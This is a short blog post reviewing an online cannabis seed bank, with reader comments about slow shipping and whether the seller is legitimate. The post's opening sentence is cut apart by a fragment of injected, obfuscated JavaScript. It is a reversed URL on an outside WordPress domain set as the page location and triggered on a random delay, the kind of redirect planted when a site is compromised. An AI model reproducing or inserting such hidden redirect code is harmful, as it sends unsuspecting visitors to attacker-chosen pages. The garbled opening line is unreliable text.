(Buying weed/marijuana seeds online) Seed Supreme seed bank Unboxing….review

1/5/2017 Trying a new seed bank toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to consider….. the facts are all in the video hope you Find it helpful

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11 thoughts on “(Buying weed/marijuana seeds online) Seed Supreme seed bank Unboxing….review”

  1. chewy96216 says:

    as im watching this just got an email about DELAYS, LOL

  2. Haenep OG-Kush says:

    I'm hoping by now you got your package okay. it may have taken a bunch of time but I did receive it finally

  3. Lance Mac says:

    I almost felt scammed until this video
    I've been waiting for over 3 weeks now pending shipment with no response from "SIMON"
    they only replied to messages before I paid within a day or so…now nothing

  4. Haenep OG-Kush says:

    Only after repeated attempts did I finally get a reply from Simon, don't give up

  5. Mason Lane says:

    Do they send you an email when they ship the seeds?

  6. Haenep OG-Kush says:

    yes they did, as soon as they shipped it out I got a tracking number the tracking number, it did not work for a day or two but at least at that point I knew they were serious and weren't just scamming me

  7. Drew Grow says:

    If you order there again I have a video called The Best seedbank Seedsupreme. I the videos description I put a link for 10% off. They are probably the last bank to take credit cards, which I like.

  8. blazeablunt4200 says:

    So seedsupreme is safe? just takes some time?

  9. Josh Hodare says:

    just know that when they need money they WONT hesitate to take yours. buy your seeds locally, you won't regret it.

  10. Cliff P says:

    FYI I just heard you on the grid boss and just subbed!

  11. GreenGoblinKush says:

    Thanks , planning on getting some autos …wasn't sure if they were legit.

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